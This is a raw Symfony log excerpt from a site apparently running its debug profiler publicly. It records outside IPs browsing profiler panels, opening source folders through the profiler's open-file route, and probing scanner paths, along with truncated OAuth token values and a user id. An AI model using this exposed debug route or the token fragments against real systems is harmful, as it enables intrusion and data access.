  9408. [2025-12-21 01:00:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=GET","method":"GET"} []
  9409. [2025-12-21 01:01:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=security","method":"GET"} []
  9410. [2025-12-21 01:01:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  9411. [2025-12-21 01:04:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"419b71","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/419b71?panel=twig","method":"GET"} []
  9412. [2025-12-21 01:04:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  9413. [2025-12-21 01:06:59] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  9414. [2025-12-21 01:07:01] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"be121b","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/be121b","method":"GET"} []
  9415. [2025-12-21 01:14:40] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  9416. [2025-12-21 01:16:46] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"5ebd67","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/5ebd67/search/results?ip=66.249.75.1&limit=10","method":"GET"} []
  9417. [2025-12-21 01:16:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.75.1&limit=10","method":"GET"} []
  9418. [2025-12-21 01:18:17] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  9419. [2025-12-21 01:18:17] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  9420. [2025-12-21 01:18:17] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  9421. [2025-12-21 01:18:17] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  9422. [2025-12-21 01:18:17] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  9423. [2025-12-21 01:18:17] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  9424. [2025-12-21 01:18:17] security.DEBUG: Calling Authentication entry point. [] []
  9425. [2025-12-21 01:18:18] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  9426. [2025-12-21 01:18:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"44e4df","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/44e4df?panel=form","method":"GET"} []
  9427. [2025-12-21 01:18:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  9428. [2025-12-21 01:21:05] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  9429. [2025-12-21 01:23:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e86139","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e86139?panel=twig","method":"GET"} []
  9430. [2025-12-21 01:23:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  9431. [2025-12-21 01:25:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /news_sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /news_sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9432. [2025-12-21 01:27:48] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"639e42","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/639e42/search/results?ip=66.249.72.70&limit=10","method":"GET"} []
  9433. [2025-12-21 01:27:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=66.249.72.70&limit=10","method":"GET"} []
  9434. [2025-12-21 01:28:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9435. [2025-12-21 01:29:48] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=src%2FAppBundle&line=0","method":"GET"} []
  9436. [2025-12-21 01:32:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"aa0429","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/aa0429?panel=form","method":"GET"} []
  9437. [2025-12-21 01:32:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  9438. [2025-12-21 01:32:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7478c3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7478c3?panel=cache","method":"GET"} []
  9439. [2025-12-21 01:32:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  9440. [2025-12-21 01:34:13] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=src%2FHona%2FWebBundle&line=0","method":"GET"} []
  9441. [2025-12-21 01:38:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /SDK/webLanguage"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /SDK/webLanguage\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9442. [2025-12-21 01:38:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"79f5c0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/79f5c0?panel=form","method":"GET"} []
  9443. [2025-12-21 01:38:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  9444. [2025-12-21 01:38:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=cache","method":"GET"} []
  9445. [2025-12-21 01:38:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  9446. [2025-12-21 01:38:55] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  9447. [2025-12-21 01:40:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=dump","method":"GET"} []
  9448. [2025-12-21 01:40:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  9449. [2025-12-21 01:40:55] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"45c799","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/45c799/search/results?limit=10&method=GET","method":"GET"} []
  9450. [2025-12-21 01:40:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  9451. [2025-12-21 01:42:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9452. [2025-12-21 01:43:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"22b906","_route":"_profiler"},"request_uri":"https://admin.unda.co/_profiler/22b906","method":"GET"} []
  9453. [2025-12-21 01:43:03] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  9454. [2025-12-21 01:43:03] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  9455. [2025-12-21 01:43:03] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  9456. [2025-12-21 01:43:03] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  9457. [2025-12-21 01:43:03] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  9458. [2025-12-21 01:43:03] security.DEBUG: Calling Authentication entry point. [] []
  9459. [2025-12-21 01:43:05] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2F22b906","method":"GET"} []
  9460. [2025-12-21 01:43:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9461. [2025-12-21 01:45:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e86139","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e86139?panel=time","method":"GET"} []
  9462. [2025-12-21 01:45:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  9463. [2025-12-21 01:46:07] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"b025a3","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/b025a3/search/results?ip=109.237.103.123&limit=10&method=GET","method":"GET"} []
  9464. [2025-12-21 01:46:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=109.237.103.123&limit=10&method=GET","method":"GET"} []
  9465. [2025-12-21 01:46:45] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  9466. [2025-12-21 01:47:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=time","method":"GET"} []
  9467. [2025-12-21 01:47:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  9468. [2025-12-21 01:48:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9469. [2025-12-21 01:50:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7408d6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7408d6","method":"GET"} []
  9470. [2025-12-21 01:50:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  9471. [2025-12-21 01:51:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e70caf","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e70caf","method":"GET"} []
  9472. [2025-12-21 01:51:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  9473. [2025-12-21 01:52:48] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"e70caf","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/e70caf/search/results?ip=66.249.75.197&limit=10","method":"GET"} []
  9474. [2025-12-21 01:52:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.75.197&limit=10","method":"GET"} []
  9475. [2025-12-21 01:56:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest?ip=66.249.75.1&limit=10","method":"GET"} []
  9476. [2025-12-21 01:56:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.75.1&limit=10","method":"GET"} []
  9477. [2025-12-21 02:00:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d40cdc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d40cdc","method":"GET"} []
  9478. [2025-12-21 02:00:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  9479. [2025-12-21 02:04:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e86139","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e86139?panel=security","method":"GET"} []
  9480. [2025-12-21 02:04:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  9481. [2025-12-21 02:05:06] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"5ebd67","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/5ebd67/search/results?ip=66.249.75.1&limit=10&method=GET","method":"GET"} []
  9482. [2025-12-21 02:05:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.75.1&limit=10&method=GET","method":"GET"} []
  9483. [2025-12-21 02:05:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"134486","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/134486","method":"GET"} []
  9484. [2025-12-21 02:05:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  9485. [2025-12-21 02:07:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9486. [2025-12-21 02:13:56] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"e70caf","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/e70caf/search/results?ip=66.249.75.1&limit=10&url=https%3A%2F%2Fweb.unda.co%2F","method":"GET"} []
  9487. [2025-12-21 02:13:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.75.1&limit=10&url=https%3A%2F%2Fweb.unda.co%2F","method":"GET"} []
  9488. [2025-12-21 02:17:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4490b3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4490b3","method":"GET"} []
  9489. [2025-12-21 02:17:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  9490. [2025-12-21 02:18:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=logger","method":"GET"} []
  9491. [2025-12-21 02:18:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  9492. [2025-12-21 02:19:45] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
  9493. [2025-12-21 02:19:45] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
  9494. [2025-12-21 02:19:45] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["7967d8158dd3144b86d148b136 [...]"] []
  9495. [2025-12-21 02:19:45] doctrine.DEBUG: "START TRANSACTION" [] []
  9496. [2025-12-21 02:19:45] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"7a241f11e18487675c3efcc048 [...]","3":"2025-12-21 02:49:45","4":"","5":398,"6":"[]"} []
  9497. [2025-12-21 02:19:45] doctrine.DEBUG: "COMMIT" [] []
  9498. [2025-12-21 02:19:45] doctrine.DEBUG: "START TRANSACTION" [] []
  9499. [2025-12-21 02:19:45] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"383ba64aa2b87196c211746ed5 [...]","3":"2026-02-19 02:19:45","4":"","5":398,"6":"[]"} []
  9500. [2025-12-21 02:19:45] doctrine.DEBUG: "COMMIT" [] []
  9501. [2025-12-21 02:19:45] doctrine.DEBUG: "START TRANSACTION" [] []
  9502. [2025-12-21 02:19:45] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"7967d8158dd3144b86d148b136 [...]"] []
  9503. [2025-12-21 02:19:45] doctrine.DEBUG: "COMMIT" [] []
  9504. [2025-12-21 02:19:46] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  9505. [2025-12-21 02:19:46] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9506. [2025-12-21 02:19:46] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9507. [2025-12-21 02:19:46] security.INFO: An AuthenticationException was thrown; redirecting to authentication entry point. {"exception":"[object] (Hona\\AdminBundle\\Exception\\NotValidTokenFoundException(code: 0): Expired Token at /var/repositories/hona/src/Hona/AdminBundle/Security/AdminUserProvider.php:79)"} []
  9508. [2025-12-21 02:19:46] security.DEBUG: Calling Authentication entry point. [] []
  9509. [2025-12-21 02:20:03] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
  9510. [2025-12-21 02:20:03] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9511. [2025-12-21 02:20:03] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9512. [2025-12-21 02:20:03] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9513. [2025-12-21 02:20:03] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9514. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["7a241f11e18487675c3efcc048 [...]"] []
